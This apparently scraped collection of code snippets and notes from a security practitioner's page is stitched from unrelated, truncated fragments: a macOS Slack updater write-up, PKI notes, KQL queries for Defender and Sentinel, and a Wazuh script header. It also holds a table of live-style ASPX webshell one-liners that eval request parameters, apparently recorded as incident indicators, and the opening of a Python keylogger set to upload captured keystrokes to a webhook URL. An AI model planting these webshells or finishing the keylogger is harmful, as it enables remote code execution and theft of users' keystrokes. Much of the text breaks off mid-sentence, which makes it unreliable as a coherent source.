Austin Songer, CISSP austinsonger

Install Slack app in User's Applications Directory - macOS

Background

This work was inspired by the challenges I encountered in the workplace. I manage several macOS remotely, and one of the biggest pains is that our users aren't administrators on those machines. Thus, they aren't able to dismiss the Squirrel Update prompts on their own, which was a productivity hindrance.

Initially as a fun side-project to satisfy my curiosity, I came up with a solution to mitigate this by having the Slack app, which was already installed in the main /Applications directory, automatically update itself as soon as the Launch Daemon script fetches a new update from slack.com. The script would notify all users actively using Slack that the app would restart itself in several seconds.

Admittedly, the above solution wasn't organic and understandably it can be a grave security concern for some. The only upside of

# Occurrences	Webshell Filename	WebShell Syntax
46	C:\inetpub\wwwroot\aspnet_client\supp0rt.aspx	http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
35	C:\inetpub\wwwroot\aspnet_client\discover.aspx	http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
21	C:\inetpub\wwwroot\aspnet_client\shell.aspx	http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["gttkomomo"],"unsafe");}</script>
13	C:\inetpub\wwwroot\aspnet_client\HttpProxy.aspx	http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
8	C:\inetpub\wwwroot\aspnet_client\0QWYSEXe.aspx	http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}</script>
7	C:\inetpub\wwwroot\aspnet_client\system_web\error.aspx	http://f/<script language=

One of the biggest barriers to starting in an unfamiliar repo is understanding how to start up the development environment, build the code, and other common tasks. Once a developer is established in a codebase, it's important to minimize development friction with common tasks.

The run script here is a very minimal script that makes it easy to see how to get started, what common tasks are available, and automates those tasks, no matter how trivial. Importantly for long-term maintainability, it allows the "repo maintainers" to change details about, say, starting a dev database, without most other engineers needing to care how that gets done (maybe we use docker-compose, maybe we use raw docker, maybe vagrant). And if they do care, they can just read the script or watch its output.

Importantly, the script is just plain old bash. Most developers are probably familiar with the syntax, and it's ubiquitous, meaning there's no dependencies to install and no esoteric shell-like syntaxes (like make) or librarie

PKI for busy people

Public-key infrastructure (PKI) is an umbrella term for everything that has to do with keys and certificates.

This is a quick overview of the important stuff.

Public-key cryptography

Public-key cryptography involves a key pair: a public key and a private key. Each entity has their own. The public key can be shared around, the private key is secret.

	#! /bin/bash
	# Email : [email protected]
	# Website : https://songer.pro
	# Wazuh
	# ------------------------------#
	# UBUNTU 18.04, 20.04
	# ------------------------------#

	clear
	echo -e "[>>] ----------------------------------------------------------- [<<]"

	let all_windows10_devices = DeviceInfo
	\| where isnotempty( OSArchitecture)
	\| extend WinVersion = case(
	OSBuild == "19041","2004",
	OSBuild == "19042","20H2",
	OSBuild == "18363","1909",
	OSBuild == "18362","1903",
	OSBuild == "17763","1809",
	OSBuild == "17134","1803",
	OSBuild == "16299","1709",

	// The below query attempts to get the avg Size in MB per client that is send from Microosoft Defender for Endpoint to Azure Sentinel when using the M365 Defender connector
	// The calculation is done as following:
	// 1. Collect the Usage data for the specified table from the Usage table, for example 'DeviceFileEvents'
	// 2. Collect the total # of devices that submitted information into the specified table, for example 'DeviceFileEvents"
	// 3 Divide the total BillableDataGB per DataType by the total number of devices that send data to get the avg MB send by client
	// 4 finally 'uniion' all tables

	let xagotime = 32d;
	let xstarttime = 31d;
	// File Events

	AuditLogRecordType

	Value Member name Description
	1 ExchangeAdmin Events from the Exchange admin audit log.
	2 ExchangeItem Events from an Exchange mailbox audit log for actions that are performed on a single item, such as creating or receiving an email message.
	3 ExchangeItemGroup Events from an Exchange mailbox audit log for actions that can be performed on multiple items, such as moving or deleted one or more email messages.
	4 SharePoint SharePoint events.
	6 SharePointFileOperation SharePoint file operation events.
	7 OneDrive OneDrive for Business events.
	8 AzureActiveDirectory Azure Active Directory events.

	// Windows 10 versions https://docs.microsoft.com/en-us/windows/release-information/
	DeviceInfo
	\| where isnotempty( OSPlatform) and OSPlatform == "Windows10"
	\| summarize arg_max(Timestamp,*) by DeviceId
	\| extend Version = case(
	OSBuild == "19041","2004",
	OSBuild == "19042","20H2",
	OSBuild == "18363","1909",
	OSBuild == "18362","1903",
	OSBuild == "17763","1809",

	# From: https://github.com/moses-palmer/pynput
	from pynput.keyboard import Key, Listener
	import os
	import sys
	import subprocess
	URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
	uploader = "C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe"
	content = ""
	def on_press(key):
	global content